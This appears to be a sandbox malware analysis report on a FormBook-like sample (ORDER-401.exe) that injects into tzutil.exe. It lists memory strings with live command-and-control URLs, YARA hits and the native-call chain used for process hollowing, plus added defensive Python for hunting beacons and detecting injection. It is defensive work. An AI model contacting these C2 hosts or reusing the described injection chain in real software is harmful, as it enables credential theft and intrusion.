                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                Source: PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 00000008.00000003.2286137861.0000000007BF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033O
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://s.yimg.com/wi/ytc.js
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003E98000.00000004.10000000.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000003108000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU
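The three 404 responses recorded above (identical 389-byte Apache error pages, seconds apart) and the two C2 URLs recovered from memory (http://www.likesharecomment.net/nqht/ and https://www.taxiquynhonnew.click/y49d/?84EhVDY=...) give the beacon shape a defender can hunt for in proxy logs: a four-character lowercase path segment, optionally one query parameter carrying a long base64-like value, sent by one client to several hosts in a short window. FormBook is known to cycle through a list of decoy domains alongside its real C2, so most of those hosts are unrelated web servers that answer 404. The Python below is an added example, not part of the Joe Sandbox report: the proxy-log layout, the thresholds (four-character path, a single parameter, value of at least 40 characters, three or more distinct hosts) and the *.test hosts, client addresses and timestamps in the sample log are constructed assumptions; the two real URLs are the ones recovered above.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# URI shape taken from the strings recovered above: /nqht/ and /y49d/?84EhVDY=<blob>.
# The four-character path, parameter-name length and 40-character value floor are
# assumptions chosen to fit those two URLs, not FormBook constants.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
PARAM_NAME_RE = re.compile(r"^[A-Za-z0-9]{4,10}$")
B64ISH_RE = re.compile(r"^[A-Za-z0-9+/=_-]{40,}$")

# Constructed proxy-log layout: <timestamp> <client> <method> <url> <status> <bytes>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<bytes>\d+)$"
)


def looks_like_formbook_uri(url: str) -> bool:
    """Short single-segment path, with at most one long base64-like parameter."""
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return False
    if not parts.query:
        return True  # bare /xxxx/ request, as in http://www.likesharecomment.net/nqht/
    if "&" in parts.query:
        return False  # the recovered C2 URL carries exactly one parameter
    name, _, value = parts.query.partition("=")
    return bool(PARAM_NAME_RE.match(name) and B64ISH_RE.match(value))


def hunt(log_lines, min_hosts: int = 3):
    """Flag clients that send FormBook-shaped requests to several distinct hosts.

    One 404 means nothing; one client hitting the same URI shape on many hosts,
    mostly answered with 404, is the decoy-domain walk.
    """
    per_client = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or not looks_like_formbook_uri(m["url"]):
            continue
        u = urlsplit(m["url"])
        per_client[m["src"]].append((u.hostname, u.path, int(m["status"])))

    findings = []
    for src, hits in sorted(per_client.items()):
        hosts = sorted({h for h, _, _ in hits})
        if len(hosts) < min_hosts:
            continue
        findings.append({
            "src": src,
            "hosts": hosts,
            "paths": sorted({p for _, p, _ in hits}),
            "requests": len(hits),
            "404s": sum(1 for _, _, s in hits if s == 404),
        })
    return findings


# Constructed sample log: the likesharecomment.net and taxiquynhonnew.click URLs
# are the ones recovered from memory above; the *.test hosts, client addresses
# and timestamps are made up for this example.
SAMPLE_LOG = """\
2024-12-12T20:39:08Z 10.0.0.5 GET http://www.likesharecomment.net/nqht/ 404 389
2024-12-12T20:39:09Z 10.0.0.5 GET http://www.decoy-one.test/nqht/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU 404 389
2024-12-12T20:39:12Z 10.0.0.5 GET http://www.decoy-two.test/nqht/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU 404 389
2024-12-12T20:39:15Z 10.0.0.5 GET https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU 404 389
2024-12-12T20:40:01Z 10.0.0.7 GET https://duckduckgo.com/ac/?q=weather 200 512
2024-12-12T20:40:02Z 10.0.0.7 GET https://www.ecosia.org/newtab/ 404 389
"""

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG.splitlines()):
        print(finding)
```

The per-client grouping matters more than the URI regex: short paths with one opaque parameter also occur in benign telemetry, so a single match should only raise severity when the same client reaches several distinct hosts with it and most of them answer 404.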

                E-Banking Fraud

                Source: Yara match | File source: 4.2.ORDER-401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.ORDER-401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample | Static PE information: Filename: ORDER-401.exe
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0042C953 NtClose
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582B60 NtClose,LdrInitializeThunk
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015835C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01584340 NtSetContextThread
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01584650 NtSuspendThread
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582BF0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582BE0 NtQueryValueKey
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582B80 NtQueryInformationFile
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582BA0 NtEnumerateValueKey
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582AD0 NtReadFile
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582AF0 NtWriteFile
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582AB0 NtWaitForSingleObject
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582D10 NtMapViewOfSection
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582D00 NtSetInformationFile
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582D30 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582DD0 NtDelayExecution
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582DB0 NtEnumerateKey
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582C60 NtCreateKey
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582C00 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582CC0 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582CF0 NtOpenProcess
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582CA0 NtQueryInformationToken
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582F60 NtCreateProcessEx
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582F30 NtCreateSection
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582FE0 NtCreateFile
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582F90 NtProtectVirtualMemory
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582FB0 NtResumeThread
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582FA0 NtQuerySection
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582E30 NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582EE0 NtQueueApcThread
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582E80 NtReadVirtualMemory
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582EA0 NtAdjustPrivilegesToken
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01583010 NtOpenDirectoryObject
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01583090 NtSetValueKey
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015839B0 NtGetContextThread
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01583D70 NtOpenThread
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01583D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D4340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D4650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D35C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D39B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D3010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D3090 NtSetValueKey
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D3D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D3D70 NtOpenThread
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_028D96E0 NtDeleteFile
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_028D9780 NtClose
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_028D9480 NtCreateFile
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_028D95F0 NtReadFile
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_028D98E0 NtAllocateVirtualMemory
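The native-call listing above comes from two processes, the unpacked payload inside ORDER-401.exe (process index 4) and tzutil.exe (process index 8), and the addresses repeat with the same low 16 bits at different bases: 4_2_01582D10 and 8_2_031D2D10 for NtMapViewOfSection, 4_2_01584340 and 8_2_031D4340 for NtSetContextThread, and so on down the list. That is what one body of code mapped into a second process looks like, and both copies carry the full NtCreateProcessEx / NtCreateSection / NtMapViewOfSection / NtWriteVirtualMemory / NtSetContextThread / NtQueueApcThread / NtResumeThread set used for process hollowing and APC injection. The Python below is an added example, not part of the Joe Sandbox report: it parses lines in the layout used here (and the raw layout with a trailing duplicate address), keeps only Nt* calls, checks each process for that injection set and reports functions that sit at the same 64 KiB-relative offset in more than one process. The sample input is copied from the listing above; the assumption that the injected regions are 64 KiB aligned (the Windows allocation granularity, so the low 16 bits survive relocation) is mine, as is the choice of which seven calls make up the chain.

```python
import re
from collections import defaultdict

# Matches "4_2_01582D10 NtMapViewOfSection" and "8_2_031D2B60 NtClose,LdrInitializeThunk"
# in both the layout used above and the raw report layout with a trailing duplicate
# address (an address starts with a digit, so it is never read as an API name).
FUNC_RE = re.compile(
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-F]{8}) (?P<apis>[A-Za-z]\w*(?:,[A-Za-z]\w*)*)"
)
SRC_RE = re.compile(r"Source:\s*(?P<src>.+?\.exe)")

# Native calls that together make up the create / map / write / set-context /
# APC / resume injection chain (selection is this example's assumption).
INJECTION_CHAIN = frozenset({
    "NtCreateProcessEx", "NtCreateSection", "NtMapViewOfSection",
    "NtWriteVirtualMemory", "NtSetContextThread", "NtQueueApcThread",
    "NtResumeThread",
})


def parse_code_functions(lines):
    """Yield (process_index, image_name, address, [api, ...]) for each report line."""
    for line in lines:
        f = FUNC_RE.search(line)
        if not f:
            continue  # bare "Code function: 4_2_004189C3" lines carry no API names
        s = SRC_RE.search(line)
        image = s["src"].rsplit("\\", 1)[-1] if s else "?"
        yield int(f["pid"]), image, int(f["addr"], 16), f["apis"].split(",")


def nt_calls_by_process(lines):
    """Map (process_index, image) -> {Nt* api: [addresses]}."""
    table = defaultdict(lambda: defaultdict(list))
    for pid, image, addr, apis in parse_code_functions(lines):
        for api in apis:
            if api.startswith("Nt"):
                table[(pid, image)][api].append(addr)
    return table


def has_injection_chain(table):
    """Processes whose listed native calls cover the whole injection chain."""
    return sorted(key for key, apis in table.items() if INJECTION_CHAIN <= set(apis))


def shared_offsets(table):
    """Nt* functions at the same 64 KiB-relative offset in two or more processes:
    the same injected code mapped at different bases. Assumes (my assumption)
    the regions are 64 KiB aligned, the Windows allocation granularity."""
    by_key = defaultdict(set)
    for (pid, _), apis in table.items():
        for api, addrs in apis.items():
            for addr in addrs:
                by_key[(api, addr & 0xFFFF)].add(pid)
    return {k: sorted(v) for k, v in by_key.items() if len(v) > 1}


# Sample input copied from the listing above (raw string: the paths contain backslashes).
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0042C953 NtClose
Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582B60 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01584340 NtSetContextThread
Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582D10 NtMapViewOfSection
Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582F60 NtCreateProcessEx
Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582F30 NtCreateSection
Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582FB0 NtResumeThread
Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582E30 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01582EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D4340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031D2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_028D9780 NtClose
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_028D98E0 NtAllocateVirtualMemory
"""

if __name__ == "__main__":
    table = nt_calls_by_process(REPORT_LINES.splitlines())
    print("injection chain present in:", has_injection_chain(table))
    for (api, off), pids in sorted(shared_offsets(table).items()):
        print(f"{api:<22} +0x{off:04X} in processes {pids}")
```

The 8_2_028D9xxx entries in tzutil.exe (NtDeleteFile, NtClose, NtCreateFile, NtReadFile, NtAllocateVirtualMemory) do not line up with anything in process 4 and are left out of the shared-offset result, which is the point of comparing offsets rather than names: the same API name appearing in two processes proves nothing, the same API at the same relative offset does.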
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 0_2_02A7CD24
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 0_2_07CB9298
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_004189C3
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0041021B
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_00401220
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_00410223
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_004022DE
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_004022E0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_00416BCE
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_00416BD3
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_00410443
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0040E463
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0040E5B3
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0040262C
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_00402630
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_00402F50
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0042EF23
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015D8158
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01540100
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_016081CC
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_016101AA
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160A352
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_016103E6
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0155E3F0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015D02C0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01550535
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01610591
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01602446
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015FE4F6
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01574750
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0154C7C0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0156C6E0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01566962
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0161A9A6
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01552840
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0155A840
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0157E8F0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015368B8
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160AB40
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01606BD7
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015ECD1F
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0155AD00
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0154ADE0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01568DBF
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01550C00
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01540CF2
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015F0CB5
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015C4F40
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01570F30
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015F2F30
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01592F28
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01542FC8
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0155CFE0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015CEFA0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01550E59
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160EE26
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160EEDB
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01562E90
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160CE93
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0161B16B
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0153F172
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0158516C
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0155B1B0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160F0E0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_016070E9
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015FF0CC
